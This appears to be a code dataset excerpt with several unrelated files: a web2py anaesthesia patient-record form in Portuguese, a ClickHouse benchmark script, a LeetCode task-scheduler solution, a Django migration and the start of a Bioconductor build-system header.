INPUT(_type='text', _id='carregar_medicamentos_em_uso', _name='carregar_medicamentos_em_uso', _value=dados.medicamentos_em_uso),
BR(),
'Alergias:',
INPUT(_type='hidden', _id='carregar_hidden_alergias', _name='carregar_hidden_alergias', _value=dados.alergias),
INPUT(_type='text', _id='carregar_alergias', _name='carregar_alergias', _value=dados.alergias),
BR(),
'Cirurgias Prévias / Antecedentes Anestésicos Pessoais e Familiares:',
INPUT(_type='hidden', _id='carregar_hidden_cirurgias_previas', _name='carregar_hidden_cirurgias_previas', _value=dados.cirurgias_previas),
INPUT(_type='text', _id='carregar_cirurgias_previas', _name='carregar_cirurgias_previas', _value=dados.cirurgias_previas),
HR(),
FIELDSET(
LEGEND(_id='carregar_lgd_vias_aereas',
*'VIAS AÉREAS')
),
BR(),
DIV(_id='carregar_div_cavidade_oral',
*FIELDSET(
LEGEND(_id='carregar_lgd_cavidade_oral',
*'CAVIDADE ORAL'),
INPUT(_type='hidden', _id='carregar_hidden_mallampati', _name='carregar_hidden_mallampati', _value=dados.mallampati),
'Mallampati: ',
SELECT(
OPTION('1', _value='MALLAPATI 1', _name='carregar_mallampati'),
OPTION('2', _value='MALLAPATI 2', _name='carregar_mallampati'),
OPTION('3', _value='MALLAPATI 3', _name='carregar_mallampati'),
OPTION('4', _value='MALLAPATI 4', _name='carregar_mallampati')
),
BR(),
'Abertura de boca limitada: ',
INPUT(_type='hidden', _id='carregar_hidden_abertura_boca', _name='carregar_hidden_abertura_boca', _value=dados.abertura_boca),
INPUT(_id='carregar_radio_aber_boca_sim',
_type='radio',
_name='carregar_abertura_boca',
_value='T'),
'sim',
INPUT(_id='carregar_radio_aber_boca_nao',
_type='radio',
_name='carregar_abertura_boca',
_value='F'),
'não',
BR(),
'Dentes Falhos: ',
INPUT(_type='hidden', _id='carregar_hidden_dentes_falhos', _name='carregar_hidden_dentes_falhos', _value=dados.dentes_falhos),
INPUT(_id='carregar_radio_dentes_falhos_sim',
_type='radio',
_name='carregar_dentes_falhos',
_value='T'),
'sim',
INPUT(_id='carregar_radio_dentes_falhos_nao',
_type='radio',
_name='carregar_dentes_falhos',
_value='F'),
'não',
BR(),
'Prótese Sup. - Inf.: ',
INPUT(_type='hidden', _id='carregar_hidden_protese', _name='carregar_hidden_protese', _value=dados.protese),
INPUT(_id='carregar_radio_protese_sim',
_type='radio',
_name='carregar_protese',
_value='T'),
'sim',
INPUT(_id='carregar_radio_protese_nao',
_type='radio',
_name='carregar_protese',
_value='F'),
'não',
BR(),
'Macroglossia: ',
INPUT(_type='hidden', _id='carregar_hidden_macroglossia', _name='carregar_hidden_macroglossia', _value=dados.macroglossia),
INPUT(_id='carregar_radio_macroglossia_sim',
_type='radio',
_name='carregar_macroglossia',
_value='T'),
'sim',
INPUT(_id='carregar_radio_macroglossia_nao',
_type='radio',
_name='carregar_macroglossia',
_value='F'),
'não',
)
),
DIV(_id='carregar_div_pescoco',
*FIELDSET(
LEGEND(_id='carregar_lgd_pescoco',
*'PESCOÇO'),
'Distância Esterno-Mento: ',
INPUT(_type='hidden', _id='carregar_hidden_distancia_esterno_mento', _name='carregar_hidden_distancia_esterno_mento', _value=dados.distancia_esterno_mento),
INPUT(_type='text', _id='carregar_dist_est_mento', _name='carregar_distancia_esterno_mento', _value=dados.distancia_esterno_mento),
BR(),
'Curto / Longo: ',
INPUT(_type='hidden', _id='carregar_hidden_pescoco_curto_longo', _name='carregar_hidden_pescoco_curto_longo', _value=dados.pescoco_curto_longo),
INPUT(_type='text', _id='carregar_curto_longo', _name='carregar_pescoco_curto_longo', _value=dados.pescoco_curto_longo),
BR(),
'Mobilidade cervical diminuida: ',
INPUT(_type='hidden', _id='carregar_hidden_mobilidade_cervical', _name='carregar_hidden_mobilidade_cervical', _value=dados.mobilidade_cervical),
INPUT(_type='text', _id='carregar_mob_cervical', _name='carregar_mobilidade_cervical', _value=dados.mobilidade_cervical),
BR(),
DIV(
FIELDSET(
'Massa cervical: ',
INPUT(_type='hidden', _id='carregar_hidden_massa_cervical', _name='carregar_hidden_massa_cervical', _value=dados.massa_cervical),
INPUT(_id='carregar_radio_massa_cervical_sim',
_type='radio',
_name='carregar_massa_cervical',
_value='T'),
'sim',
INPUT(_id='carregar_radio_massa_cervical_nao',
_type='radio',
_name='carregar_massa_cervical',
_value='F'),
'não',
)
),
BR(),
DIV(
FIELDSET(
'Desvio de traquéia: ',
INPUT(_type='hidden', _id='carregar_hidden_desvio_traqueia', _name='carregar_hidden_desvio_traqueia', _value=dados.desvio_traqueia),
INPUT(_id='carregar_radio_desvio_traqueia_sim',
_type='radio',
_name='carregar_desvio_traqueia',
_value='T'),
'sim',
INPUT(_id='carregar_radio_desvio_traqueia_nao',
_type='radio',
_name='carregar_desvio_traqueia',
_value='F'),
'não',
)
),
BR(),
'Distância Mento-Hióide: ',
INPUT(_type='hidden', _id='carregar_hidden_distancia_mento_hiloide', _name='carregar_hidden_distancia_mento_hiloide', _value=dados.distancia_mento_hiloide),
INPUT(_type='text', _id='carregar_dist_mento_hioide', _name='carregar_distancia_mento_hiloide', _value=dados.distancia_mento_hiloide),
BR(),
'Circunferência cervical: ',
INPUT(_type='hidden', _id='carregar_hidden_circunferencia_cervical', _name='carregar_hidden_circunferencia_cervical', _value=dados.circunferencia_cervical),
INPUT(_type='text', _id='carregar_circunferencia_cervical', _name='carregar_circunferencia_cervical', _value=dados.circunferencia_cervical),
)
),
DIV(_id='carregar_div_atencao',
*FIELDSET(
LEGEND(_id='carregar_lgd_atencao',
*'ATENÇÃO'),
'História Prévia Dificuldade de intubação: ',
INPUT(_type='hidden', _id='carregar_hidden_dificuldade_intubacao', _name='carregar_hidden_dificuldade_intubacao', _value=dados.dificuldade_intubacao),
INPUT(_type='checkbox', _id='carregar_chk_hist', _name='carregar_dificuldade_intubacao', _value='T'),
BR(),
'Via aérea dificil: ',
INPUT(_type='hidden', _id='carregar_hidden_via_aerea_dificil', _name='carregar_hidden_via_aerea_dificil', _value=dados.via_aerea_dificil),
INPUT(_type='checkbox', _id='carregar_chk_via_aerea_dif', _name='carregar_via_aerea_dificil', _value='T'),
BR(),
'História de anafilaxia: ',
INPUT(_type='hidden', _id='carregar_hidden_anafilaxia', _name='carregar_hidden_anafilaxia', _value=dados.historia_de_anafilaxia),
INPUT(_type='checkbox', _id='carregar_anafilaxia', _name='carregar_anafilaxia', _value='T'),
BR(),
'Estômago Cheio: ',
INPUT(_type='hidden', _id='carregar_hidden_estomago_cheio', _name='carregar_hidden_estomago_cheio', _value=dados.estomago_cheio),
INPUT(_type='checkbox', _id='carregar_chk_estomago_cheio', _name='carregar_estomago_cheio', _value='T'),
BR(),
'Repor. Corticóide: ',
INPUT(_type='hidden', _id='carregar_hidden_corticoide', _name='carregar_hidden_corticoide', _value=dados.corticoide),
INPUT(_type='checkbox', _id='carregar_chk_corticoide', _name='carregar_corticoide', _value='T'),
BR(),
'Profilaxia Endocardite Bacteriana: ',
INPUT(_type='hidden', _id='carregar_hidden_endocardite', _name='carregar_hidden_endocardite', _value=dados.endocardite_bacteriana),
INPUT(_type='checkbox', _id='carregar_profilaxia', _name='carregar_endocardite_bacteriana', _value='T'),
)
),
HR(),
DIV(_id='carregar_div_exames_laboratoriais',
*FIELDSET(
LEGEND(_id='carregar_lgd_exames_lab',
*'EXAMES LABORATORIAS'),
"HB: ",
INPUT(_type='hidden', _id='carregar_hidden_hb', _name='carregar_hidden_hb', _value=dados.hb),
INPUT(_type='text', _id='carregar_txt_hb', _name='carregar_hb', _value=dados.hb),
"HT: ",
INPUT(_type='hidden', _id='carregar_hidden_ht', _name='carregar_hidden_ht', _value=dados.ht),
INPUT(_type='text', _id='carregar_txt_ht', _name='carregar_ht', _value=dados.ht),
"HM: ",
INPUT(_type='hidden', _id='carregar_hidden_hm', _name='carregar_hidden_hm', _value=dados.hm),
INPUT(_type='text', _id='carregar_txt_hm', _name='carregar_hm', _value=dados.hm),
"Plaq: ",
INPUT(_type='hidden', _id='carregar_hidden_plaquetas', _name='carregar_hidden_plaquetas', _value=dados.plaquetas),
INPUT(_type='text', _id='carregar_txt_plaq', _name='carregar_plaquetas', _value=dados.plaquetas),
"Gli: ",
INPUT(_type='hidden', _id='carregar_hidden_glicose', _name='carregar_hidden_glicose', _value=dados.glicose),
INPUT(_type='text', _id='carregar_txt_gli', _name='carregar_glicose', _value=dados.glicose),
BR(),
"U: ",
INPUT(_type='hidden', _id='carregar_hidden_u', _name='carregar_hidden_u', _value=dados.u),
INPUT(_type='text', _id='carregar_txt_u', _name='carregar_u', _value=dados.u),
"CR: ",
INPUT(_type='hidden', _id='carregar_hidden_cr', _name='carregar_hidden_cr', _value=dados.cr),
INPUT(_type='text', _id='carregar_txt_cr', _name='carregar_cr', _value=dados.cr),
"NA+: ",
INPUT(_type='hidden', _id='carregar_hidden_na', _name='carregar_hidden_na', _value=dados.na),
INPUT(_type='text', _id='carregar_txt_na', _name='carregar_na', _value=dados.na),
"K+: ",
INPUT(_type='hidden', _id='carregar_hidden_k', _name='carregar_hidden_k', _value=dados.k),
INPUT(_type='text', _id='carregar_txt_k', _name='carregar_k', _value=dados.k),
)
),
HR(),
DIV(_id='carregar_div_eventos_operatorios',
*FIELDSET(
LEGEND(_id='carregar_lgd_eventos_operatorios',
*'EVENTOS OPERATÓRIOS'),
'Duração do Procedimento: ',
INPUT(_type='hidden', _id='carregar_hidden_duracao_procedimento', _name='carregar_hidden_duracao_procedimento', _value=dados.duracao_procedimento),
INPUT(_type='text', _id='carregar_txt_duracao_procedimento', _name='carregar_duracao_procedimento', _value=dados.duracao_procedimento),
BR(),
'Duração da Cirurgia: ',
INPUT(_type='hidden', _id='carregar_hidden_duracao_cirurgia', _name='carregar_hidden_duracao_cirurgia', _value=dados.duracao_cirurgia),
INPUT(_type='text', _id='carregar_txt_duracao_cirurgia', _name='carregar_duracao_cirurgia', _value=dados.duracao_cirurgia),
)
),
BR(),
HR(),
DIV(_id='carregar_div_monitorizacao',
*FIELDSET(
LEGEND(_id='carregar_lgd_monitorizacao',
*'MONITORIZAÇÃO'),
'Cardioscópio: ',
INPUT(_type='hidden', _id='carregar_hidden_cardioscopio', _name='carregar_hidden_cardioscopio', _value=dados.cardioscopio),
INPUT(_id='carregar_radio_cardioscopio_sim',
_type='radio',
_name='carregar_cardioscopio',
_value='T'),
'sim',
INPUT(_id='carregar_radio_cardioscopio_nao',
_type='radio',
_name='carregar_cardioscopio',
_value='F'),
'não',
BR(),
'Ox. Digital: ',
INPUT(_type='hidden', _id='carregar_hidden_ox_digital', _name='carregar_hidden_ox_digital', _value=dados.ox_digital),
INPUT(_id='carregar_radio_ox_digital_sim',
_type='radio',
_name='carregar_ox_digital',
_value='T'),
'sim',
INPUT(_id='carregar_radio_ox_digital_nao',
_type='radio',
_name='carregar_ox_digital',
_value='F'),
'não',
BR(),
'PNI: ',
INPUT(_type='hidden', _id='carregar_hidden_pni', _name='carregar_hidden_pni', _value=dados.pni),
INPUT(_id='carregar_radio_pni_sim',
_type='radio',
_name='carregar_pni',
_value='T'),
'sim',
INPUT(_id='carregar_radio_pni_nao',
_type='radio',
_name='carregar_pni',
_value='F'),
'não',
BR(),
'PAINV: ',
INPUT(_type='hidden', _id='carregar_hidden_painv', _name='carregar_hidden_painv', _value=dados.painv),
INPUT(_id='carregar_radio_painv_sim',
_type='radio',
_name='carregar_painv',
_value='T'),
'sim',
INPUT(_id='carregar_radio_painv_nao',
_type='radio',
_name='carregar_painv',
_value='F'),
'não',
BR(),
'CAPNÓGRAFO: ',
INPUT(_type='hidden', _id='carregar_hidden_capnografo', _name='carregar_hidden_capnografo', _value=dados.capnografo),
INPUT(_id='carregar_radio_capnografo_sim',
_type='radio',
_name='carregar_capnografo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_capnografo_nao',
_type='radio',
_name='carregar_capnografo',
_value='F'),
'não',
BR(),
'An. Gases: ',
INPUT(_type='hidden', _id='carregar_hidden_an_gases', _name='carregar_hidden_an_gases', _value=dados.an_gases),
INPUT(_id='carregar_radio_an_gases_sim',
_type='radio',
_name='carregar_an_gases',
_value='T'),
'sim',
INPUT(_id='carregar_radio_an_gases_nao',
_type='radio',
_name='carregar_an_gases',
_value='F'),
'não',
BR(),
'outros: ',
INPUT(_type='hidden', _id='carregar_hidden_outros_monitorizacao', _name='carregar_hidden_outros_monitorizacao', _value=dados.outros_monitorizacao),
INPUT(_type='text', _id='carregar_outros_monitorizacao', _name='carregar_outros_monitorizacao', _value=dados.outros_monitorizacao)
)
),
DIV(_id='carregar_div_tecnica',
*FIELDSET(
LEGEND(_id='carregar_lgd_tecnica',
*'TÉCNICA'),
'Geral: ',
INPUT(_type='hidden', _id='carregar_hidden_tec_geral', _name='carregar_hidden_tec_geral', _value=dados.tec_geral),
INPUT(_id='carregar_radio_tec_geral_sim',
_type='radio',
_name='carregar_tec_geral',
_value='T'),
'sim',
INPUT(_id='carregar_radio_tec_geral_nao',
_type='radio',
_name='carregar_tec_geral',
_value='F'),
'não',
BR(),
INPUT(_type='hidden', _id='carregar_hidden_plexo', _name='carregar_hidden_plexo', _value=dados.plexo),
'Bloqueio regional ou Plexo: ',
INPUT(_id='carregar_radio_plexo_sim',
_type='radio',
_name='carregar_plexo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_plexo_nao',
_type='radio',
_name='carregar_plexo',
_value='F'),
'não',
BR(),
INPUT(_type='hidden', _id='carregar_hidden_neuroeixo', _name='carregar_hidden_neuroeixo', _value=dados.bloqueio_neuroeixo),
'Bloqueio de Neuroeixo: ',
INPUT(_id='carregar_radio_neuroeixo_sim',
_type='radio',
_name='carregar_bloqueio_neuroeixo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_neuroeixo_nao',
_type='radio',
_name='carregar_bloqueio_neuroeixo',
_value='F'),
'não',
BR(),
'Combinada: ',
INPUT(_type='hidden', _id='carregar_hidden_combinada', _name='carregar_hidden_combinada', _value=dados.combinada),
INPUT(_id='carregar_radio_combinada_sim',
_type='radio',
_name='carregar_combinada',
_value='T'),
'sim',
INPUT(_id='carregar_radio_combinada_nao',
_type='radio',
_name='carregar_combinada',
_value='F'),
'não',
BR(),
'Sedação: ',
INPUT(_type='hidden', _id='carregar_hidden_sedacao', _name='carregar_hidden_sedacao', _value=dados.sedacao),
INPUT(_id='carregar_radio_sedacao_sim',
_type='radio',
_name='carregar_sedacao',
_value='T'),
'sim',
INPUT(_id='carregar_radio_sedacao_nao',
_type='radio',
_name='carregar_sedacao',
_value='F'),
'não',
BR(),
)
),
DIV(_id='carregar_div_acesso_vias_aereas',
*FIELDSET(
LEGEND(_id='carregar_lgd_acesso_vias_aereas',
*'ACESSO A VIA AÉREA'),
'Sub Máscara: ',
INPUT(_type='hidden', _id='carregar_hidden_sub_mascara', _name='carregar_hidden_sub_mascara', _value=dados.sub_mascara),
INPUT(_id='carregar_radio_sub_mascara_sim',
_type='radio',
_name='carregar_sub_mascara',
_value='T'),
'sim',
INPUT(_id='carregar_radio_sub_mascara_nao',
_type='radio',
_name='carregar_sub_mascara',
_value='F'),
'não',
BR(),
'Canula Naso: ',
INPUT(_type='hidden', _id='carregar_hidden_canula_naso', _name='carregar_hidden_canula_naso', _value=dados.canula_naso),
INPUT(_id='carregar_radio_can_naso_sim',
_type='radio',
_name='carregar_canula_naso',
_value='T'),
'sim',
INPUT(_id='carregar_radio_can_naso_nao',
_type='radio',
_name='carregar_canula_naso',
_value='F'),
'não',
BR(),
'Canula Orofaringea: ',
INPUT(_type='hidden', _id='carregar_hidden_canula_orofaringea', _name='carregar_hidden_canula_orofaringea', _value=dados.canula_orofaringea),
INPUT(_id='carregar_radio_can_orofaringea_sim',
_type='radio',
_name='carregar_canula_orofaringea',
_value='T'),
'sim',
INPUT(_id='carregar_radio_can_orofaringea_nao',
_type='radio',
_name='carregar_canula_orofaringea',
_value='F'),
'não',
BR(),
'Máscara Laríngea: ',
INPUT(_type='hidden', _id='carregar_hidden_mascara_laringea', _name='carregar_hidden_mascara_laringea', _value=dados.mascara_laringea),
INPUT(_id='carregar_radio_masc_laringea_sim',
_type='radio',
_name='carregar_mascara_laringea',
_value='T'),
'sim',
INPUT(_id='carregar_radio_masc_laringea_nao',
_type='radio',
_name='carregar_mascara_laringea',
_value='F'),
'não',
DIV(_id='carregar_div_masc_laringea',
*FIELDSET(
'NR:',
INPUT(_type='hidden', _id='carregar_hidden_nr_mascara_laringea', _name='carregar_hidden_nr_mascara_laringea', _value=dados.nr_mascara_laringea),
INPUT(_typr='text', _id='carregar_nr_masc_laringea', _name='carregar_nr_mascara_laringea', _value=dados.nr_mascara_laringea)
)),
BR(),
'Intubação Oro Traqueal: ',
INPUT(_type='hidden', _id='carregar_hidden_intubacao_oro_traqueal', _name='carregar_hidden_intubacao_oro_traqueal', _value=dados.intubacao_oro_traqueal),
INPUT(_id='carregar_radio_int_oro_traqueal_sim',
_type='radio',
_name='carregar_intubacao_oro_traqueal',
_value='T'),
'sim',
INPUT(_id='carregar_radio_int_oro_traqueal_nao',
_type='radio',
_name='carregar_intubacao_oro_traqueal',
_value='F'),
'não',
DIV(_id='carregar_div_int_oro_traqueal',
*FIELDSET(
'Diâmetro do tubo: ',
INPUT(_type='hidden', _id='carregar_hidden_intubacao_oro_traqueal', _name='carregar_hidden_intubacao_oro_traqueal', _value=dados.diametro_tubo),
INPUT(_typr='text', _id='carregar_diametro_tubo', _name='carregar_diametro_tubo'),
BR(),
'Tipo naso: ',
INPUT(_type='hidden', _id='carregar_hidden_tipo_naso', _name='carregar_hidden_tipo_naso', _value=dados.tipo_naso),
INPUT(_id='carregar_radio_tipo_naso_sim',
_type='radio',
_name='carregar_tipo_naso',
_value='T'),
'sim',
INPUT(_id='carregar_radio_tipo_naso_nao',
_type='radio',
_name='carregar_tipo_naso',
_value='F'),
'não',
BR(),
'Tipo aramado: ',
INPUT(_type='hidden', _id='carregar_hidden_tipo_aramado', _name='carregar_hidden_tipo_aramado', _value=dados.tipo_aramado),
INPUT(_id='carregar_radio_tipo_aramado_sim',
_type='radio',
_name='carregar_tipo_aramado',
_value='T'),
'sim',
INPUT(_id='carregar_radio_tipo_aramado_nao',
_type='radio',
_name='carregar_tipo_aramado',
_value='F'),
'não',
BR(),
'Tipo dupla luz: ',
INPUT(_type='hidden', _id='carregar_hidden_dupla_luz', _name='carregar_hidden_dupla_luz', _value=dados.dupla_luz),
INPUT(_id='carregar_radio_tipo_dupla_luz_sim',
_type='radio',
_name='carregar_dupla_luz',
_value='T'),
'sim',
INPUT(_id='carregar_radio_tipo_dupla_luz_nao',
_type='radio',
_name='carregar_dupla_luz',
_value='F'),
'não',
BR(),
'Tipo balao: ',
INPUT(_type='hidden', _id='carregar_hidden_balao', _name='carregar_hidden_balao', _value=dados.balao),
INPUT(_id='carregar_radio_balao_sim',
_type='radio',
_name='carregar_balao',
_value='T'),
'sim',
INPUT(_id='carregar_radio_balao_nao',
_type='radio',
_name='carregar_balao',
_value='F'),
'não',
BR(),
'Laringoscopia: ',
INPUT(_type='hidden', _id='carregar_hidden_laringoscopia', _name='carregar_hidden_laringoscopia', _value=dados.laringoscopia),
INPUT(_id='carregar_radio_laringoscopia_sim',
_type='radio',
_name='carregar_laringoscopia',
_value='T'),
'sim',
INPUT(_id='carregar_radio_laringoscopia_nao',
_type='radio',
_name='carregar_laringoscopia',
_value='F'),
'não',
BR(),
'Broncofibroscopia: ',
INPUT(_type='hidden', _id='carregar_hidden_broncofibroscopia', _name='carregar_hidden_broncofibroscopia', _value=dados.broncofibroscopia),
INPUT(_id='carregar_radio_broncofibroscopia_sim',
_type='radio',
_name='carregar_broncofibroscopia',
_value='T'),
'sim',
INPUT(_id='carregar_radio_broncofibroscopia_nao',
_type='radio',
_name='carregar_broncofibroscopia',
_value='F'),
'não',
BR(),
'Estilete luminoso: ',
INPUT(_type='hidden', _id='carregar_hidden_estilete_luminoso', _name='carregar_hidden_estilete_luminoso', _value=dados.estilete_luminoso),
INPUT(_id='carregar_radio_est_luminoso_sim',
_type='radio',
_name='carregar_estilete_luminoso',
_value='T'),
'sim',
INPUT(_id='carregar_radio_est_luminoso_nao',
_type='radio',
_name='carregar_estilete_luminoso',
_value='F'),
'não',
BR(),
'Videolaringoscopia: ',
INPUT(_type='hidden', _id='carregar_hidden_videolaringoscopia', _name='carregar_hidden_videolaringoscopia', _value=dados.videolaringoscopia),
INPUT(_id='carregar_radio_videolaringoscopia_sim',
_type='radio',
_name='carregar_videolaringoscopia',
_value='T'),
'sim',
INPUT(_id='carregar_radio_videolaringoscopia_nao',
_type='radio',
_name='carregar_videolaringoscopia',
_value='F'),
'não',
)
),
BR(),
)
),
HR(),
BR(),
DIV(_id='carregar_div_agentes',
*FIELDSET(
LEGEND(_id='carregar_lgd_agentes',
*'Agentes'),
DIV('Nome: ',
INPUT(_type='hidden', _id='carregar_agente1_controle', _name='carregar_agente1_controle', _value=dados.agente1),
INPUT(_type='text', _id='carregar_agente1', _name='carregar_agente1', _value=dados.agente1),
INPUT(_type='button', _id='carregar_btn_inclui_agente1', _name='carregar_btn_inclui_agente1', _value= '+', _onclick='chama_segundo()'),
_id='div_primero_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente2', _name='carregar_agente2', _value=dados.agente2),
INPUT(_type='hidden', _id='carregar_agente2_controle', _name='carregar_agente2_controle', _value=dados.agente2),
INPUT(_type='button', _id='carregar_btn_esconder_agente2', _name='carregar_btn_esconder_agente2', _value='-', _onclick= 'esconde_segundo()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente2', _name='carregar_btn_inclui_agente2', _value='+', _onclick= 'chama_terceiro()'),
_id='div_segundo_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente3', _name='carregar_agente3', _value=dados.agente3),
INPUT(_type='hidden', _id='carregar_agente3_controle', _name='carregar_agente3_controle', _value=dados.agente3),
INPUT(_type='button', _id='carregar_btn_esconder_agente3', _name='carregar_btn_esconder_agente3', _value='-', _onclick='esconde_terceiro()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente3', _name='carregar_btn_inclui_agente3', _value='+', _onclick='chama_quarto()'),
_id='div_terceiro_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente4', _name='carregar_agente4', _value=dados.agente4),
INPUT(_type='hidden', _id='carregar_agente4_controle', _name='carregar_agente4_controle', _value=dados.agente4),
INPUT(_type='button', _id='carregar_btn_esconder_agente4', _name='carregar_btn_esconder_agente4', _value='-', _onclick='esconde_quarto()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente4', _name='carregar_btn_inclui_agente4', _value='+', _onclick='chama_quinto()'),
_id='div_quarto_agente'),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente5', _name='carregar_agente5', _value=dados.agente5),
INPUT(_type='hidden', _id='carregar_agente5_controle', _name='carregar_agente5_controle', _value=dados.agente5),
INPUT(_type='button', _id='carregar_btn_esconder_agente5', _name='carregar_btn_esconder_agente5', _value='-', _onclick='esconde_quinto()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente5', _name='carregar_btn_inclui_agente5', _value='+', _onclick='chama_sexto()'),
_id='div_quinto_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente6', _name='carregar_agente6', _value=dados.agente6),
INPUT(_type='hidden', _id='carregar_agente6_controle', _name='carregar_agente6_controle', _value=dados.agente6),
INPUT(_type='button', _id='carregar_btn_esconder_agente6', _name='carregar_btn_esconder_agente6', _value='-', _onclick='esconde_sexto()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente6', _name='carregar_btn_inclui_agente6', _value='+', _onclick='chama_setimo()'),
_id='div_sexto_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente7', _name='carregar_agente7', _value=dados.agente7),
INPUT(_type='hidden', _id='carregar_agente7_controle', _name='carregar_agente7_controle', _value=dados.agente7),
INPUT(_type='button', _id='carregar_btn_esconder_agente7', _name='carregar_btn_esconder_agente7', _value='-', _onclick='esconde_setimo()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente7', _name='carregar_btn_inclui_agente7', _value='+', _onclick='chama_oitavo()'),
_id='div_setimo_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente8', _name='carregar_agente8', _value=dados.agente8),
INPUT(_type='hidden', _id='carregar_agente8_controle', _name='carregar_agente8_controle', _value=dados.agente8),
INPUT(_type='button', _id='carregar_btn_esconder_agente8', _name='carregar_btn_esconder_agente8', _value='-', _onclick='esconde_oitavo()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente8', _name='carregar_btn_inclui_agente8', _value='+', _onclick='chama_nono()'),
_id='div_oitavo_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente9', _name='carregar_agente9', _value=dados.agente9),
INPUT(_type='hidden', _id='carregar_agente9_controle', _name='carregar_agente9_controle', _value=dados.agente9),
INPUT(_type='button', _id='carregar_btn_esconder_agente9', _name='carregar_btn_esconder_agente9', _value='-', _onclick='esconde_nono()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente9', _name='carregar_btn_inclui_agente9', _value='+', _onclick='chama_decimo()'),
_id='div_nono_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente10', _name='carregar_agente10', _value=dados.agente10),
INPUT(_type='hidden', _id='carregar_agente10_controle', _name='carregar_agente10_controle', _value=dados.agente10),
INPUT(_type='button', _id='carregar_btn_esconder_agente10', _name='carregar_btn_inclui_agente10', _value='-', _onclick='esconde_decimo()'),
_id='div_decimo_agente'
),
)),
BR(),
HR(),
FIELDSET(
LEGEND(_id='carregar_lgd_dados_cirurgia',
*'DADOS CIRURGIA'),
'Cirurgia: ',
INPUT(_type='hidden', _id='carregar_hidden_cirurgia', _name='carregar_hidden_cirurgia', _value=dados.cirurgia),
INPUT(_type='text', _id='carregar_cirurgia', _name='carregar_cirurgia', _value=dados.cirurgia),
BR(),
'Anestesista: ',
INPUT(_type='hidden', _id='carregar_hidden_anestesia', _name='carregar_hidden_anestesia', _value=dados.anestesia),
INPUT(_type='text', _id='carregar_anestesia', _name='carregar_anestesia', _value=dados.anestesia),
BR(),
'Cirurgião: ',
INPUT(_type='hidden', _id='carregar_hidden_cirurgiao', _name='carregar_hidden_cirurgiao', _value=dados.cirurgiao),
INPUT(_type='text', _id='carregar_cirurgiao', _name='carregar_cirurgiao', _value=dados.cirurgiao),
),
BR(),
HR(),
INPUT(_type='button', _id='btn_confirmar_alteracao', _name='btn_confirmar_alteracao', _value='Confirmar Alteração'),
INPUT(_type='button', _id='btn_cancelar_alteracao', _name='btn_cancelar_alteracao', _value='Cancelar Alteração', _onclick='fn_fechar_div_alteracao()'),
)
)
)
)
)
)
return campos
def altera_dados():
query = db(db.paciente.id == request.vars.id).select()
for dados in query:
dados_alterados = 1;
return dados_alterados
def index():
myconsulta = ''
linhas = ''
dados = ''
qtd_linhas = 0
busca = gerar_campos_busca()
campo_h = request.vars.campo_hidden_escolha_busca
if busca.accepts(request, session):
if request.vars.campo_hidden_escolha_busca == "1":
linhas = consulta_nome(request.vars.nome_busca)
qtd_linhas = conta_consulta(request.vars.nome_busca, 1)
elif request.vars.campo_hidden_escolha_busca == "2":
linhas = consulta_registro(request.vars.nr_registro_busca)
qtd_linhas = conta_consulta(request.vars.nr_registro_busca, 2)
return dict(busca=busca, linhas=linhas, nr_linhas=qtd_linhas)
|
994,259 | 960e00276841e7d48dc3c4df8bfc4e1f58f4de5d | #!/usr/bin/env python
import subprocess
import sys
from subprocess import PIPE
def extract(filename, table):
overall_count = 0
overall_time = 0
count = 0
time = 0
with open(filename, 'r') as f:
for line in f.readlines():
for i in range(3):
if not line.strip():
continue
try:
sql = line.format(table)
p = subprocess.Popen(["clickhouse-client", "--time", "--format=Null", "-q", sql],
stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=True)
except OSError:
break
out = p.stderr.read()
if out:
time += float(out)
count += 1
overall_time += float(out)
overall_count += 1
if count == 100:
print("count = ", count, "time = ", time)
time = 0
count = 0
print("overall count = ", overall_count, "time = ", overall_time)
if sys.argv[1] == '--help':
print('benchmark.py <queries_file> <clickhouse_table>')
exit(0)
extract(sys.argv[1], sys.argv[2])
|
994,260 | 1f1710c149810be37dbdab0536f83869e0931679 | class Solution:
def taskSchedulerII(self, tasks: 'List[int]', space: int) -> int: #O( N | N )
date = 1 #current date
d = {} #to record last time the task was performed
for t in tasks :
if t not in d or d[t] + space + 1 < date: #current task can be performed
d[t] = date
date += 1
elif d[t] + space + 1 >= date:
d[t] += space + 1
date = d[t] + 1
return date - 1 # since the date is +1 in the for..loop, the final result needs to minus 1
|
994,261 | bb77229bc913ccc8801ac5c0469b6528835e5eb6 | # Generated by Django 3.1.4 on 2020-12-19 12:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('clues', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='clue',
name='codeword',
),
migrations.AddField(
model_name='clue',
name='codeword_1',
field=models.CharField(default=None, max_length=255, null=True),
),
migrations.AddField(
model_name='clue',
name='codeword_2',
field=models.CharField(default=None, max_length=255, null=True),
),
migrations.AddField(
model_name='clue',
name='viewed_1',
field=models.BooleanField(default=None, null=True),
),
migrations.AddField(
model_name='clue',
name='viewed_2',
field=models.BooleanField(default=None, null=True),
),
migrations.AlterField(
model_name='clue',
name='is_view',
field=models.BooleanField(default=None, null=True),
),
migrations.AlterField(
model_name='clue',
name='view',
field=models.CharField(default=None, max_length=255, null=True),
),
]
|
994,262 | 42be26907190bcfd80b5e128fd00ee007e3efc33 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
##############################################################################
###
### This file is part of the BBS software (Bioconductor Build System).
###
### Authors:
